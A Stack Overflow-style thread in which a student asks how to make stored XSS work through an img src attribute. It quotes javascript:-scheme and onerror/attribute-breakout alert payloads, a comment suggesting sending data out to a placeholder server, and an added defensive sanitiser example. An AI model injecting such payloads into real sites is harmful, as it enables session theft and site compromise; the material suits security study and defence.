1

I have to do an XSS attack for a security-related university project. I want to store an image that has malicious code inside its source attribute. However, it seems that I don't have access to any JavaScript objects from the src attribute.

Here are some things I tried:

<img src="j&#X41vascript:alert('XSS')">

Throws: Reference Error alert is not defined.

<img src="j&#X41vascript:window.alert('XSS')">

Throws: Reference Error window is not defined

<img src="j&#X41vascript:var x = new XMLHttpRequest();">

Throws: Reference Error XMLHttpRequest is not defined

What is the problem here, and how can I access the main window of the site and the objects I want to access?

EDIT: Onerror and all the other events are filtered.

5
  • This comment is not really helpful. Why is it not executed? And the error implies that it is executed. Commented Nov 25, 2014 at 12:26
  • Can you do something like javascript:'http//yourserver.example?js='+Object (and look what is arriving at yourserver)? Commented Nov 25, 2014 at 12:29
  • Not all browsers are vulnerable to this attack. What browser are you targeting/testing? - stackoverflow.com/questions/1798633/… Commented Nov 25, 2014 at 12:30
  • I'm testing on Firefox. Commented Nov 25, 2014 at 12:32
  • There is no way to execute JavaScript code through the src attribute of img. (I assume that quotes are encoded.) Also, have you read this? stackoverflow.com/questions/1798633/… Commented Nov 25, 2014 at 12:33

1 Answer

2

The src isn't executed, so that won't work.

A solution would be to use onerror:

<img src="wrong" onerror="alert('XSS')">

Depending on how your src attribute is injected, you may be able to pass this value:

wrong" onerror="alert('XSS')

But no decent framework is vulnerable to that kind of attack.


2 Comments

Actually, the javascript pseudo protocol denotes anything following is interpreted as JavaScript.
@Gumbo On the src attribute with a not super old browser? I don't think so.
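
From the defending side, the values tried in this thread are all handled by two checks when a stored URL is written into an img tag: a scheme allowlist on the parsed URL, then attribute encoding of the result. The sketch below is an added example, not code from the question or the answer; `renderImg`, `escapeAttr` and the base URL `https://app.example/` are hypothetical names chosen for illustration.

```javascript
// Added example. renderImg, escapeAttr and the base URL are hypothetical.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Encode every character that could close the attribute or begin an entity,
// so the browser never sees a raw quote or a decodable "&#...".
function escapeAttr(value) {
  return String(value).replace(/[&<>"'`=]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// Returns a safe <img> tag, or null when the URL is rejected.
function renderImg(userUrl, base = "https://app.example/") {
  let url;
  try {
    // The WHATWG parser lower-cases the scheme and strips tabs/newlines,
    // so mixed-case or whitespace-split schemes are normalised before the check.
    url = new URL(userUrl, base);
  } catch {
    return null;
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return null;
  // Emit the parser's serialisation, not the raw input.
  return `<img src="${escapeAttr(url.href)}">`;
}

// Inputs taken from the thread, plus one ordinary URL (constructed).
const samples = [
  "javascript:alert('XSS')",
  "j&#X41vascript:alert('XSS')",
  "wrong\" onerror=\"alert('XSS')",
  "https://cdn.example/a.png",
];
for (const s of samples) {
  console.log(JSON.stringify(s), "->", renderImg(s));
}
```

The entity-encoded value is kept as a harmless relative URL because the `&` is re-encoded before it reaches the browser, and the quote-breakout value ends up with its quotes percent-encoded inside a single attribute.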
